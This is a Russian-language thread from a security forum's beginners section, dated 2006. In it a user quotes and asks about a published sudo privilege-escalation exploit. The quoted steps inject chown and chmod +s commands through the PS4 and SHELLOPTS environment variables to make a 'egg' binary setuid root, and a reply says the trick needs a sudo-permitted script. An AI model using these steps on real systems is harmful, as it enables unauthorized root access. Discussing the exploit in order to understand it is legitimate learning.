информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Портрет посетителяАтака на InternetГде водятся OGRы
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Ростелеком заподозрили в попытке... 
 Линуксовый ботнет, распространяющийся... 
 Конец поддержки Internet Explorer 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / beginners
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Господа, будьте снисходительны, не бросайтесь сразу штрафовать за, как вам кажется, глупые вопросы - beginners на то и beginners.
да, это на тот случай если разрешено какой-нить файл запускать через sudo 07.09.06 12:52  Число просмотров: 1154
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
<"чистая" ссылка> <обсуждение закрыто>
<beginners>
Sudo local root escalation privilege 06.09.06 17:27  
Автор: TRESPASSER[CfK] Статус: Незарегистрированный пользователь
Отредактировано 07.09.06 12:08  Количество правок: 3
<"чистая" ссылка> <обсуждение закрыто>
Поправьте если что то не так понимаю (цитаты из ссылки - см.)
поправки личные =D. наверно не отличные.
создаем x.sh следующего содержания (я понимаю что сат это не делает, но у меня нет этого х.sh)
//cut

#!/bin/bash -x
echo "Getting root!!"

//cut
при событии !/bin/bash -x выводим getting root;
потом потом непонятным образом (без прав) нужно менять /etc/sudoers
//cut

breno ALL=(ALL) /home/breno/x.sh

//cut
как это делать если его даже смотреть(как в примере) нельзя - непонятно;
далее пишем "яйцо" =)(наверно пасхальное) и тут же компилим - тут проблем нет
потом ставим переменные окружения (зачем - не знаю, прокомментируйте plz)
//cut

setenv SHELLOPTS xtrace
setenv PS4 '$(chown root:root egg)'

//cut
зачем xtrace? причем явно видно что во второй наверно инжектится каким то образом команда смены "владельца" для нашего "яйца";
далее - запускаем скрипт ч\з sudo
//cut

sudo ./x.sh

//cut
после чего владельцем "яйца" становиться root; опять меняем загадочную переменную PS4 в которой уже теперь меняются права на доступ к "яйцу"
//cut

% setenv PS4 '$(chmod +s egg)'

//cut
все... теперь после запуска мы получаем шелл который прописан у нас в "яйце"
только что то у меня даже владелец не поменялся. Да - версия sudo у меня подходит.
тут вот только понял -## You need sudo access execution for some bash script
это он про х.sh что ли? а как я узнаю какой у меня разрешен? и опять же как я его поменяю(х.sh) вруг у него владелец root? (или обрабатывать это событрие ненадо - правда зачем кричать что мы тут делаем), и почему именно сишным шеллом менять этот загадочный shellopts? что он такое вообще?
дополнение от 07,09 - вообщем я так понял если у меня нет в sudoers какого нибудь скрипта для моего аккаунта разрешенного то нечего и пытаться?

http://milw0rm.com/exploits/1310
да, это на тот случай если разрешено какой-нить файл запускать через sudo 07.09.06 12:52  
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
<"чистая" ссылка> <обсуждение закрыто>
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2022 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach